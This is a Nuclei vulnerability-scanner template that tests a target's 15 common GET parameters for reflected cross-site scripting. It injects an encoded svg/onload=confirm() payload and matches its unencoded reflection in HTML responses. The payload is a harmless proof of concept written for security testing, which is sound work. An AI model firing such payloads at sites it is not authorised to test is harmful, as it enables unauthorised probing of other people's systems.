nuclei-templates/vulnerabilities/generic/top-xss-params.yaml

56 lines
2.3 KiB
YAML

id: top-xss-params
info:
name: Top 15 XSS Parameter Check
author: foulenzer & geeknik
severity: medium
description: Searches for reflected XSS in the server response via GET-requests.
tags: xss
parameters: q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p
requests:
- method: GET
path:
- "{{BaseURL}}/?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E"
redirects: true
max-redirects: 1
matchers-condition: and
matchers:
- type: word
words:
- "'>\"<svg/onload=confirm('q')>"
- "'>\"<svg/onload=confirm('s')>"
- "'>\"<svg/onload=confirm('search')>"
- "'>\"<svg/onload=confirm('id')>"
- "'>\"<svg/onload=confirm('action')>"
- "'>\"<svg/onload=confirm('keyword')>"
- "'>\"<svg/onload=confirm('query')>"
- "'>\"<svg/onload=confirm('page')>"
- "'>\"<svg/onload=confirm('keywords')>"
- "'>\"<svg/onload=confirm('url')>"
- "'>\"<svg/onload=confirm('view')>"
- "'>\"<svg/onload=confirm('cat')>"
- "'>\"<svg/onload=confirm('name')>"
- "'>\"<svg/onload=confirm('key')>"
- "'>\"<svg/onload=confirm('p')>"
part: body
condition: or
- type: word
words:
- "text/html"
part: header
- type: word
words:
- "<title>Access Denied</title>"
- "You don't have permission to access"
part: body
condition: and
negative: true
- type: status
status:
- 200